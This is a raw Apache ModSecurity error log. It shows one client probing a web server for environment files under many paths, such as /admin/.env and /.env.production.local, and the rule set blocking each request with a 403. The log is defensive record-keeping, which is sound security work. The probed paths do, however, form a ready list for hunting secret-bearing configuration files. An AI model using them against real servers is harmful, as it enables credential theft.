[Tue Aug 12 02:35:25.923572 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfwAAAAI"]
[Tue Aug 12 02:35:25.923816 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfwAAAAI"]
[Tue Aug 12 02:35:25.924011 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zfwAAAAI"]
[Tue Aug 12 02:35:26.022561 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgAAAAAI"]
[Tue Aug 12 02:35:26.022829 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgAAAAAI"]
[Tue Aug 12 02:35:26.023027 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgAAAAAI"]
[Tue Aug 12 02:35:26.045922 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgQAAAAI"]
[Tue Aug 12 02:35:26.046168 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgQAAAAI"]
[Tue Aug 12 02:35:26.046369 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgQAAAAI"]
[Tue Aug 12 02:35:26.069069 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zggAAAAI"]
[Tue Aug 12 02:35:26.069373 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zggAAAAI"]
[Tue Aug 12 02:35:26.069578 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zggAAAAI"]
[Tue Aug 12 02:35:26.092154 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgwAAAAI"]
[Tue Aug 12 02:35:26.092403 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgwAAAAI"]
[Tue Aug 12 02:35:26.092621 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zgwAAAAI"]
[Tue Aug 12 02:35:26.115003 2025] [authz_core:error] [pid 1889988] [client 185.177.72.115:11042] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Tue Aug 12 02:35:26.261866 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziAAAAAI"]
[Tue Aug 12 02:35:26.262242 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziAAAAAI"]
[Tue Aug 12 02:35:26.262537 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziAAAAAI"]
[Tue Aug 12 02:35:26.285282 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziQAAAAI"]
[Tue Aug 12 02:35:26.285649 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziQAAAAI"]
[Tue Aug 12 02:35:26.285916 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziQAAAAI"]
[Tue Aug 12 02:35:26.308587 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zigAAAAI"]
[Tue Aug 12 02:35:26.308967 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zigAAAAI"]
[Tue Aug 12 02:35:26.309252 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zigAAAAI"]
[Tue Aug 12 02:35:26.331959 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziwAAAAI"]
[Tue Aug 12 02:35:26.332321 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziwAAAAI"]
[Tue Aug 12 02:35:26.332583 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_ziwAAAAI"]
[Tue Aug 12 02:35:26.354837 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zjAAAAAI"]
[Tue Aug 12 02:35:26.355097 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zjAAAAAI"]
[Tue Aug 12 02:35:26.355293 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zjAAAAAI"]
[Tue Aug 12 02:35:26.459948 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aJqMTr1qHv1U4ugo3Y_zjwAAAAI"]
[Tue Aug 12 02:35:26.460198 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aJqMTr1qHv1U4ugo3Y_zjwAAAAI"]
[Tue Aug 12 02:35:26.460390 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aJqMTr1qHv1U4ugo3Y_zjwAAAAI"]
[Tue Aug 12 02:35:26.482872 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkAAAAAI"]
[Tue Aug 12 02:35:26.483139 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkAAAAAI"]
[Tue Aug 12 02:35:26.483334 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkAAAAAI"]
[Tue Aug 12 02:35:26.506106 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkQAAAAI"]
[Tue Aug 12 02:35:26.506487 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkQAAAAI"]
[Tue Aug 12 02:35:26.506749 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkQAAAAI"]
[Tue Aug 12 02:35:26.529077 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkgAAAAI"]
